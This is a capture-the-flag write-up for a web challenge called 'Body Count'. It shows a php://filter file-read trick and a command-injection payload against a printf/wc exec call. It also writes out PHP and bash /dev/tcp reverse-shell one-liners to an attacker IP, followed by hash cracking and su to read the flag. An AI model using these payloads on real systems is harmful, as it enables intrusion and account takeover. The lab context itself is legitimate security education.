# Body Count ## Challenge details **Category** : Web **points** : 493 **Description** : Here’s a character count service for you! http://chall.csivit.com:30202 ## Solution First time in the website we see a black screen written but nothing intresting by observing the url `http://chall.csivit.com:30202/?file=wc.php` we can see that's it's the content of the `wc.php` so i tried checking `robots.txt` and we got this : ``` Disallow: /?file=checkpass.php ``` In order to be able to see the content of `checkpass.php` we can use a php filter ``` http://chall.csivit.com:30202/?file=php://filter/convert.base64-encode/resource=checkpass.php ``` Using that we got the base64 of the `checkpass.php` after decoding it we got this : **checkpass.php** ``` php wc as a service

Character Count as a Service

The Character Count is: " . exec('printf \'' . $text . '\' | wc -c') . ""; } ?> ``` By looking to the source code we can divide it into two parts #### Part One Our cookie password will get checked , in case of fail a message saying `Sorry, only people from csivit are allowed to access this page.` will appear and the rest of the code won't be executed due to the die() focntion . So we tried the password that we got earlier `w0rdc0unt123` and it worked now we can see the rest of the webpage and pass to the second part #### Part Two As we can see our input `Text`obtained by the GET form will be putten inside this command `printf '{text}' | wc -c`. We can easily bypass this and get a command execution using this payload : `'; command # ` * ` ' ` : To close the first quote and complete the printf command * ` ; ` : In order to specify a second command * `command` : This is the command tha we want to execute * `#` : To comment out the rest **Note** : We will only get the last line of the result due to the exec focntion that only returns the last line of the result a way to bypass it is by adding `| head -n $line` after the command where $line represents the line you want to read but we will not need to do this here So after that I tried `'; ls #` and this was the result : ``` The Character Count is: wc.php ``` Bingo ! Our code injection worked now we will try to spawn a shell , at the begining i tried to do it with netcat and python but neither of those were present in the server so i did it using php and this was the command : ``` php -r '$sock=fsockopen( "$your_adress_ip" , $port );exec("/bin/sh -i <&3 >&3 2>&3");' ``` The full command will be like this : ``` ' ; php -r '$sock=fsockopen( "$your_adress_ip" , $port );exec("/bin/sh -i <&3 >&3 2>&3");' # ``` Another way to do it is using the bach technique : ``` bash -i >& /dev/tcp/$your_adress_ip/$port 0>&1 ``` With that we were able to get a shell in the server and we were the user `www- data` ``` www-data@9c9f6ae73053:/var/www/html$ ```` After navigating a little bit inside the server I found two intresting files : * `flag.txt` : Which was located at `/ctf/system/of/a/down/` to find it you can use this `find / -iname "*flag*" ` .But we can't read it because of permissions, the only users who could read it are `root` and `csictf` * `README` : A file located at `/ctf` and this was its content : ``` My password hash is 6f246c872cbf0b7fd7530b7aa235e67e. ``` So this is propably the password of the `csictf` user, all we need to do is crack it than su to csictf and read the flag . I wasn't able to crack it using john but an online crackstation were able to crack it and this is the passsword `csictf` i think anyone could guess it Now we can change user to `csictf` using `su` and read the flag #### The Flag ``` csictf{1nj3ct10n_15_p41nfu1} ``` Original writeup (https://github.com/ouxs-19/CTF_Writeups/tree/master/csictf- web-Body_count).